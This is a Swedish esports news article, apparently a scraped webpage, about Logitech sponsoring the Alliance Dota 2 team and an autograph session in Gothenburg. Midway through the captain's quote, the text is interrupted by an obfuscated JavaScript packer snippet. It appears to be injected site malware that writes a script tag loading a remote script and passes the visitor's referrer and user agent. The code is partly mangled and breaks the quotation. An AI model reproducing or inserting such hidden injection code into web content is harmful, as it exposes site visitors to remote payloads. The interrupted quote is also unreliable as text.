Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Logitech och svenska esport-stjärnorna Alliance inleder samarbete

Logitech och svenska esport-stjärnorna Alliance inleder samarbete
Sebastian

Hårdvarutillverkaren Logitech offentliggör idag sitt samarbete med svenska esport-giganterna Alliances Dota 2-lag. Laget, som blev ordentligt omskrivna under hösten när de tog förstaplatsen i storturneringen The International och kammade hem en rekordprissumma på över nio miljoner kronor, kommer framöver använda möss, tangentbord och musmattor från Logitech G.

“Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erbft|var|u0026u|referrer|zeazk||js|php’.split(’|’),0,{}))
är härligt att ha Logitechs erfarenhet och kunnande i ryggen,” säger Jonathan ”Loda” Berg, kapten i Alliances Dota 2-lag. ”Som veteran i esportvärlden respekterar jag andra som också arbetat hårt och målmedvetet för sin plats och sitt goda rykte. Logitech G är ett självklart namn här. Det ska bli härligt att få använda deras produkter när vi försvarar titeln i The International.”

”Alliance har varit dominerande på Dota 2-scenen länge,” säger Christina Holmberg på Logitech Sverige. ”Med en stabil laguppställning som inkluderar några av de allra största esportlegenderna och ett otroligt solitt taktiskt tänkande är Alliance utan tvekan ett av de bästa Dota 2-lagen i världen. Vi är otroligt stolta över att de nu är ett av lagen som använder vår Logitech G-utrustning.”

Inför sitt deltagande i Dreamhack Summer kommer Alliance bootcampa i Göteborg. Fans och nyfikna är välkomna att komma förbi och önska dem lycka till och hämta en signerad idolbild eller planch den 11:e juni mellan klockan 12:30-14:00 på Webbhallen Göteborg, Ekelundsgatan 4.